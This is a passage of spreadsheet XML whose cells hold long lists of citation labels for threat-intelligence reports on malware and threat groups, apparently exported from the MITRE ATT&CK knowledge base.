MacOS April 2018),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye FIN6 April 2016),(Citation: Kaspersky Turla Aug 2014),(Citation: ESET Operation Groundbait),(Citation: Novetta Winnti April 2015),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Symantec Shuckworm January 2022),(Citation: CrowdStrike Putter Panda),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: ESET Okrum July 2019),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Securelist Dtrack),(Citation: Symantec Remsec IOCs),(Citation: FireEye FIN7 Oct 2019),(Citation: Anomali Rocke March 2019),(Citation: Accenture Dragonfish Jan 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: FireEye MuddyWater Mar 2018),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Malwarebytes Pony April 2016),(Citation: ESET Zebrocy Nov 2018),(Citation: Check Point APT35 CharmPower January 2022),(Citation: ESET Sednit Part 1),(Citation: CrowdStrike IceApple May 2022),(Citation: FireEye FIN7 April 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Talos Lokibot Jan 2021),(Citation: alientvault macspy),(Citation: Proofpoint TA505 October 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Morphisec ShellTea June 2019),(Citation: CISA Zebrocy Oct 2020),(Citation: XAgentOSX 2017),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Cisco Talos Intelligence Group),(Citation: NSA/FBI Drovorub August 2020),(Citation: FireEye MESSAGETAP October 2019),(Citation: ESET LightNeuron May 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: ESET Zebrocy May 2019),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Kaspersky StoneDrill 2017),(Citation: Check Point Meteor Aug 2021),(Citation: FireEye APT32 May 2017),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Unit 42 Sofacy Feb 2018),(Citation: NCC Group Team9 June 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Accenture Hogfish April 2018),(Citation: ESET Telebots Dec 2016),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Unit 42 NETWIRE April 2020),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Sophos SamSam Apr 2018),(Citation: Unit42 Redaman January 2019),(Citation: ESET Grandoreiro April 2020),(Citation: ESET Telebots July 2017),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Palo Alto MoonWind March 2017),(Citation: ESET Sednit USBStealer 2014),(Citation: FireEye APT34 Dec 2017),(Citation: FireEye APT17),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: CheckPoint Naikon May 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: McAfee Honeybee),(Citation: ESET Gazer Aug 2017),(Citation: Talos Konni May 2017),(Citation: Cyphort EvilBunny Dec 2014),(Citation: ESET Machete July 2019),(Citation: Unit 42 Inception November 2018),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Unit 42 Kazuar May 2017),(Citation: Unit42 RDAT July 2020),(Citation: FireEye FIN10 June 2017),(Citation: Unit 42 Bisonal July 2018),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: CERT-EE Gamaredon January 2021),(Citation: CheckPoint Bandook Nov 2020),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Unit42 Emissary Panda May 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Citizen Lab Group5),(Citation: FireEye TRITON 2019),(Citation: Unit42 BabyShark Apr 2019),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ANSSI Sandworm January 2021),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: McAfee Oceansalt Oct 2018),(Citation: Crowdstrike Qakbot October 2020),(Citation: McAfee Sharpshooter December 2018),(Citation: Securelist Kimsuky Sept 2013),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET Attor Oct 2019),(Citation: Symantec Dragonfly),(Citation: Fidelis Turbo),(Citation: CarbonBlack LockerGoga 2019),(Citation: ESET DazzleSpy Jan 2022),(Citation: Check Point Pay2Key November 2020),(Citation: objective-see windtail2 jan 2019),(Citation: TrendMicro BlackTech June 2017),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: Bitdefender Naikon April 2021),(Citation: Flashpoint FIN 7 March 2019),(Citation: Unit 42 CARROTBAT November 2018),(Citation: McAfee Cuba April 2021),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: ASERT InnaputRAT April 2018),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: GDATA Zeus Panda June 2017),(Citation: Gh0stRAT ATT March 2019),(Citation: Kroll Qakbot June 2020),(Citation: Novetta Blockbuster),(Citation: Kaspersky CactusPete Aug 2020),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Kaspersky Lyceum October 2021),(Citation: Microsoft SIR Vol 21),(Citation: Securelist Calisto July 2018),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Trustwave GoldenSpy2 June 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Talos Cobalt Group July 2018),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Sofacy Komplex Trojan),(Citation: Kaspersky MoleRATs April 2019),(Citation: Trend Micro IXESHE 2012),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: FOX-IT May 2016 Mofang),(Citation: ATT QakBot April 2021),(Citation: FireEye APT38 Oct 2018),(Citation: Unit 42 QUADAGENT July 2018),(Citation: FireEye CARBANAK June 2017),(Citation: Group IB GrimAgent July 2021),(Citation: Cyberreason Anchor December 2019),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: Microsoft PLATINUM April 2016),(Citation: Group IB Ransomware September 2020),(Citation: FireEye Clandestine Fox),(Citation: ESET InvisiMole June 2020),(Citation: Symantec Hydraq Jan 2010),(Citation: Group IB Silence Sept 2018),(Citation: Proofpoint TA505 Jan 2019),(Citation: Fidelis INOCNATION),</t>
  </si>
  <si>
    <t>(Citation: ESET InvisiMole June 2018),(Citation: CarbonBlack RobbinHood May 2019),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Technet Net Use),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 PingPull Jun 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: ESET InvisiMole June 2018),(Citation: NCSC Cyclops Blink February 2022),(Citation: ESET OceanLotus macOS April 2019),(Citation: ESET Turla PowerShell May 2019),(Citation: Lotus Blossom Jun 2015),(Citation: McAfee GhostSecret),(Citation: ESET OceanLotus Mar 2019),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Scarlet Mimic Jan 2016),(Citation: Novetta Blockbuster),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Prevailion EvilNum May 2020),(Citation: FireEye APT32 May 2017),(Citation: ESET Kobalos Jan 2021),(Citation: FireEye POSHSPY April 2017),(Citation: PWC KeyBoys Feb 2017),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Novetta-Axiom),(Citation: Dell TG-3390),(Citation: Crowdstrike Indrik November 2018),(Citation: Github PowerShell Empire),(Citation: ESET Gelsemium June 2021),(Citation: ESET Sednit USBStealer 2014),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: ESET Gazer Aug 2017),(Citation: Novetta Winnti April 2015),(Citation: Novetta Blockbuster Loaders),(Citation: NHS UK BLINDINGCAN Aug 2020),(Citation: NCSC Joint Report Public Tools),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: CrowdStrike Putter Panda),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Cylance Dust Storm),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: McAfee Shamoon December 2018),(Citation: Anomali Rocke March 2019),(Citation: FireEye TRITON 2019),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: 20 macOS Common Tools and Techniques),(Citation: Fidelis Turbo),(Citation: Novetta Blockbuster Destructive Malware),(Citation: ESET Attor Oct 2019),(Citation: Crowdstrike DNC June 2016),(Citation: cobaltstrike manual),(Citation: ESET DazzleSpy Jan 2022),(Citation: Lee 2013),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: VectorSec ForFiles Aug 2017),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Qualys LolZarus),(Citation: Evi1cg Forfiles Nov 2017),</t>
  </si>
  <si>
    <t>(Citation: Trend Micro njRAT 2018),(Citation: TrendMicro Lazarus Nov 2018),(Citation: Aquino RARSTONE),(Citation: Trend Micro Qakbot May 2020),(Citation: Medium Anchor DNS July 2020),(Citation: McAfee Gold Dragon),(Citation: Talos PoetRAT April 2020),(Citation: ESET Gelsemium June 2021),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Sophos Netwalker May 2020),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Trusteer Carberp October 2010),(Citation: TrendMicro Taidoor),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: TrendMicro PE_URSNIF.A2),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: MSTIC FoggyWeb September 2021),(Citation: Symantec Darkmoon Aug 2005),(Citation: Securelist Dropping Elephant),(Citation: Kaspersky QakBot September 2021),(Citation: Nccgroup Gh0st April 2018),(Citation: FireEye Metamorfo Apr 2018),(Citation: Trend Micro Ransomware February 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Trend Micro Waterbear December 2019),(Citation: FireEye POSHSPY April 2017),(Citation: McAfee Night Dragon),(Citation: Securelist MiniDuke Feb 2013),(Citation: CyberBit Dtrack),(Citation: Securelist ScarCruft May 2019),(Citation: CoinTicker 2019),(Citation: Symantec Whitefly March 2019),(Citation: Cybereason Bazar July 2020),(Citation: GitHub Sliver Upload),(Citation: Picus Sodinokibi January 2020),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: JPCert TSCookie March 2018),(Citation: Rancor Unit42 June 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: FireEye APT37 Feb 2018),(Citation: BiZone Lizar May 2021),(Citation: FireEye APT41 March 2020),(Citation: ESET Sednit Part 1),(Citation: Talos Frankenstein June 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Symantec Volgmer Aug 2014),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Shaheen Nov 2018),(Citation: ThreatExpert Agent.btz),(Citation: ESET LightNeuron May 2019),(Citation: Kaspersky StoneDrill 2017),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Securelist APT10 March 2021),(Citation: ESET Telebots Dec 2016),(Citation: wardle evilquest partii),(Citation: BleepingComputer Molerats Dec 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Trend Micro Tick November 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Unit 42 WhisperGate January 2022),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye APT34 Dec 2017),(Citation: CheckPoint Naikon May 2020),(Citation: ESET ForSSHe December 2018),(Citation: ESET Gazer Aug 2017),(Citation: McAfee Honeybee),(Citation: SANS Conficker),(Citation: Check Point Warzone Feb 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Unit 42 Kazuar May 2017),(Citation: NCSC Joint Report Public Tools),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: ESET Sednit Part 3),(Citation: FireEye FIN7 March 2017),(Citation: Group IB APT 41 June 2021),(Citation: Unit42 BabyShark Apr 2019),(Citation: Symantec Buckeye),(Citation: Palo Alto DNS Requests),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET DazzleSpy Jan 2022),(Citation: Unit 42 CARROTBAT November 2018),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: DigiTrust NanoCore Jan 2017),(Citation: ESET Turla Mosquito May 2018),(Citation: Symantec Backdoor.Mivast),(Citation: JPCert PLEAD Downloader June 2018),(Citation: JPCERT ChChes Feb 2017),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Palo Alto OilRig Sep 2018),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Donut Github),(Citation: Symantec Wiarp May 2012),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: DOJ FIN7 Aug 2018),(Citation: Unit 42 CARROTBAT January 2020),(Citation: Palo Alto menuPass Feb 2017),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: Unit42 Xbash Sept 2018),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: Fidelis INOCNATION),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: ESET InvisiMole June 2018),(Citation: ESET EvilNum July 2020),(Citation: Secureworks Karagany July 2019),(Citation: Proofpoint TA416 Europe March 2022),(Citation: PTSecurity Cobalt Dec 2016),(Citation: NCCGroup RokRat Nov 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Prevailion EvilNum May 2020),(Citation: Cybereason Egregor Nov 2020),(Citation: PWC KeyBoys Feb 2017),(Citation: Lazarus RATANKBA),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Mandiant APT1 Appendix),(Citation: Unit42 Azorult Nov 2018),(Citation: Lazarus APT January 2022),(Citation: Malwarebytes SmokeLoader 2016),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: ESET TeleBots Oct 2018),(Citation: Symantec Linfo May 2012),(Citation: Trend Micro Qakbot December 2020),(Citation: RATANKBA),(Citation: Bitdefender StrongPity June 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Volexity PowerDuke November 2016),(Citation: Symantec WastedLocker June 2020),(Citation: Trend Micro Cyclops Blink March 2022),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Cycraft Chimera April 2020),(Citation: FireEye NETWIRE March 2019),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Profero APT27 December 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Lotus Blossom Dec 2015),(Citation: Github PowerShell Empire),(Citation: Rapid7 KeyBoy Jun 2013),(Citation: Intezer TeamTNT September 2020),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Bitdefender APT28 Dec 2015),(Citation: McAfee Sodinokibi October 2019),(Citation: Unit 42 Valak July 2020),(Citation: Novetta Winnti April 2015),(Citation: ProofPoint SettingContent-ms July 2018),(Citation: Microsoft POLONIUM June 2022),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Symantec Bumblebee June 2022),(Citation: Symantec Remsec IOCs),(Citation: Chronicle Winnti for Linux May 2019),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Cyble Sidewinder September 2020),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Kaspersky Winnti April 2013),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Palo Alto Sofacy 06-2018),(Citation: Unit 42 Lucifer June 2020),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: ESET Zebrocy May 2019),(Citation: Talos ROKRAT),(Citation: Check Point Meteor Aug 2021),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Mandiant APT1),(Citation: Lab52 WIRTE Apr 2019),(Citation: Cisco H1N1 Part 2),(Citation: trendmicro xcsset xcode project 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: ESET Grandoreiro April 2020),(Citation: Security Affairs DustSquad Oct 2018),(Citation: Volexity OceanLotus Nov 2017),(Citation: Unit 42 TA551 Jan 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: PWC WellMess July 2020),(Citation: Bitdefender FIN8 July 2021),(Citation: ATT Sidewinder January 2021),(Citation: LOLBAS Certutil),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Unit 42 Bisonal July 2018),(Citation: ESET Industroyer),(Citation: FireEye admin@338),(Citation: McAfee Sharpshooter December 2018),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: ANSSI Sandworm January 2021),(Citation: ESET Attor Oct 2019),(Citation: Cybereason Kimsuky November 2020),(Citation: NCSC Cyclops Blink February 2022),(Citation: Unit 42 MechaFlounder March 2019),(Citation: Microsoft Holmium June 2020),(Citation: McAfee Cuba April 2021),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: ESET Lazarus Jun 2020),(Citation: Talos Seduploader Oct 2017),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: F-Secure The Dukes),(Citation: CISA AA20-301A Kimsuky),(Citation: Kaspersky Lyceum October 2021),(Citation: Talos NavRAT May 2018),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Talos Cobalt Group July 2018),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Symantec Frutas Feb 2013),(Citation: Zscaler Bazar September 2020),(Citation: Trend Micro Totbrick Oct 2016),(Citation: Unit 42 SeaDuke 2015),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: Palo Alto OilRig May 2016),(Citation: FireEye APT38 Oct 2018),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Cyberreason Anchor December 2019),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: FireEye Clandestine Fox),(Citation: McAfee Lazarus Jul 2020),(Citation: Symantec Hydraq Jan 2010),(Citation: Crowdstrike DNC June 2016),(Citation: Proofpoint TA505 Jan 2019),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Securelist ShadowPad Aug 2017),(Citation: objectivesee osx.shlayer apple approved 2020),(Citation: Talos ZxShell Oct 2014),(Citation: Kaspersky Tomiris Sep 2021),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Check Point APT34 April 2021),(Citation: Symantec Briba May 2012),(Citation: Cybereason Valak May 2020),(Citation: Volexity Patchwork June 2018),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: TechNet Copy),(Citation: Unit 42 Nokki Oct 2018),(Citation: Crowdstrike Indrik November 2018),(Citation: CISA WellMess July 2020),(Citation: Microsoft FTP),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Securelist WhiteBear Aug 2017),(Citation: Secureworks MCMD July 2019),(Citation: Leonardo Turla Penquin May 2020),(Citation: ESET RTM Feb 2017),(Citation: FireEye Periscope March 2018),(Citation: ESET Gamaredon June 2020),(Citation: Intrinsec Egregor Nov 2020),(Citation: Dell TG-3390),(Citation: Microsoft DUBNIUM June 2016),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Deep Instinct TA505 Apr 2019),(Citation: NCSC APT29 July 2020),(Citation: Check Point Rocket Kitten),(Citation: GitHub Pupy),(Citation: Dell Sakula),(Citation: Threatpost Hancitor),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Unit 42 OilRig Sept 2018),(Citation: Securelist Octopus Oct 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: LOLBAS Esentutl),(Citation: PWC Cloud Hopper April 2017),(Citation: TrendMicro TropicTrooper 2015),(Citation: ESET LoudMiner June 2019),(Citation: Kaspersky WIRTE November 2021),(Citation: Talos Rocke August 2018),(Citation: Accenture Lyceum Targets November 2021),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: TrendMicro MacOS April 2018),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Intezer Doki July 20),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro DarkComet Sept 2014),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Securelist Dtrack),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Malwarebytes Pony April 2016),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Lee 2013),(Citation: Trend Micro Skidmap),(Citation: Forcepoint Felismus Mar 2017),(Citation: Talos Lokibot Jan 2021),(Citation: Proofpoint TA505 October 2019),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Qualys LolZarus),(Citation: FireEye APT10 April 2017),(Citation: Talos PoetRAT October 2020),(Citation: NTT Security Flagpro new December 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Checkpoint IndigoZebra July 2021),(Citation: NCC Group Team9 June 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Aqua Kinsing April 2020),(Citation: Symantec Chafer February 2018),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Talos Konni May 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Novetta Blockbuster Loaders),(Citation: Unit42 RDAT July 2020),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Google TAG Lazarus Jan 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: 20 macOS Common Tools and Techniques),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Symantec Dragonfly),(Citation: Symantec Security Center Trojan.Kwampirs),(Citation: TrendMicro BlackTech June 2017),(Citation: Recorded Future REDDELTA July 2020),(Citation: Bitdefender Naikon April 2021),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Cyberint Qakbot May 2021),(Citation: Gh0stRAT ATT March 2019),(Citation: Microsoft WhisperGate January 2022),(Citation: Talos Cobalt Strike September 2020),(Citation: Juniper IcedID June 2020),(Citation: Talos Agent Tesla Oct 2018),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Objective-See MacMa Nov 2021),(Citation: Novetta-Axiom),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: CIRCL PlugX March 2013),(Citation: IBM IcedID November 2017),(Citation: SecureWorks August 2019),(Citation: Cofense Astaroth Sept 2018),(Citation: Group IB GrimAgent July 2021),(Citation: Intezer HiddenWasp Map 2019),(Citation: US-CERT Bankshot Dec 2017),(Citation: Microsoft PLATINUM April 2016),(Citation: Prevx Carberp March 2011),(Citation: Symantec Vasport May 2012),(Citation: Group IB Silence Sept 2018),(Citation: Unit 42 KerrDown February 2019),(Citation: FireEye APT28),(Citation: PaloAlto DNS Requests May 2016),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: CISA WellMail July 2020),(Citation: Carbon Black HotCroissant April 2020),(Citation: Cybereason Astaroth Feb 2019),(Citation: Scarlet Mimic Jan 2016),(Citation: Accenture MUDCARP March 2019),(Citation: Cybereason Molerats Dec 2020),(Citation: Unit42 Cannon Nov 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: BlackBerry Bahamut),(Citation: TrendMicro Gamaredon April 2020),(Citation: Symantec Dyre June 2015),(Citation: Zscaler Kasidet),(Citation: Unit 42 Gamaredon February 2022),(Citation: ClearSky Siamesekitten August 2021),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Proofpoint Azorult July 2018),(Citation: Microsoft PLATINUM June 2017),(Citation: FireEye FiveHands April 2021),(Citation: Microsoft BITSAdmin),(Citation: Fidelis njRAT June 2013),(Citation: US-CERT TA18-074A),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Symantec Pasam May 2012),(Citation: Google EXOTIC LILY March 2022),(Citation: jRAT Symantec Aug 2018),(Citation: TechNet Certutil),(Citation: Riskiq Remcos Jan 2018),(Citation: Cisco Ukraine Wipers January 2022),(Citation: CISA SoreFang July 2016),(Citation: Cybereason PowerLess February 2022),(Citation: Cybereason Soft Cell June 2019),(Citation: Unit 42 BackConfig May 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Bisonal Mar 2020),(Citation: IBM Grandoreiro April 2020),(Citation: Fortinet Diavol July 2021),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Github Koadic),(Citation: Symantec Ristol May 2012),(Citation: Symantec Elfin Mar 2019),(Citation: Symantec Shuckworm January 2022),(Citation: FireEye SMOKEDHAM June 2021),(Citation: FireEye APT33 Sept 2017),(Citation: FoxIT Wocao December 2019),(Citation: ClearSky Wilted Tulip July 2017),(Citation: ESET Okrum July 2019),(Citation: Unit42 Molerat Mar 2020),(Citation: Symantec Backdoor.Nidiran),(Citation: ESET Exchange Mar 2021),(Citation: Accenture Dragonfish Jan 2018),(Citation: Carbon Black Shlayer Feb 2019),(Citation: FireEye MuddyWater Mar 2018),(Citation: Uptycs Confucius APT Jan 2021),(Citation: FireEye FIN7 April 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Symantec Calisto July 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: Morphisec ShellTea June 2019),(Citation: Gigamon Berserk Bear October 2021),(Citation: Trustwave GoldenSpy June 2020),(Citation: US-CERT Volgmer Nov 2017),(Citation: Microsoft GALLIUM December 2019),(Citation: Cisco Talos Intelligence Group),(Citation: NSA/FBI Drovorub August 2020),(Citation: Medium Metamorfo Apr 2020),(Citation: Medium S2W WhisperGate January 2022),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Unit42 Redaman January 2019),(Citation: Linux FTP),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: TrendMicro macOS Dacls May 2020),(Citation: ESET Twitter Ida Pro Nov 2021),(Citation: Malwarebytes DarkComet March 2018),(Citation: ESET Machete July 2019),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Talos Sodinokibi April 2019),(Citation: CheckPoint Bandook Nov 2020),(Citation: Unit42 Emissary Panda May 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Microsoft NICKEL December 2021),(Citation: Crowdstrike Qakbot October 2020),(Citation: GitHub QuasarRAT),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Cybereason TA505 April 2019),(Citation: Flashpoint FIN 7 March 2019),(Citation: GDATA Zeus Panda June 2017),(Citation: Novetta Blockbuster),(Citation: Kaspersky CactusPete Aug 2020),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Talos Micropsia June 2017),(Citation: FireEye Fin8 May 2016),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Microsoft HAFNIUM March 2020),(Citation: Unit 42 Hildegard Malware),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Kaspersky MoleRATs April 2019),(Citation: Trend Micro IXESHE 2012),(Citation: Microsoft Actinium February 2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: sentinelone shlayer to zshlayer),(Citation: BlackBerry Amadey 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: ESET PipeMon May 2020),(Citation: Trend Micro Muddy Water March 2021),(Citation: Proofpoint NETWIRE December 2020),(Citation: Unit42 BendyBear Feb 2021),(Citation: Unit 42 RGDoor Jan 2018),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Radware Micropsia July 2018),(Citation: Group IB Ransomware September 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Trend Micro Daserf Nov 2017),(Citation: ESET InvisiMole June 2020),(Citation: Forcepoint Monsoon),(Citation: Talos TinyTurla September 2021),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
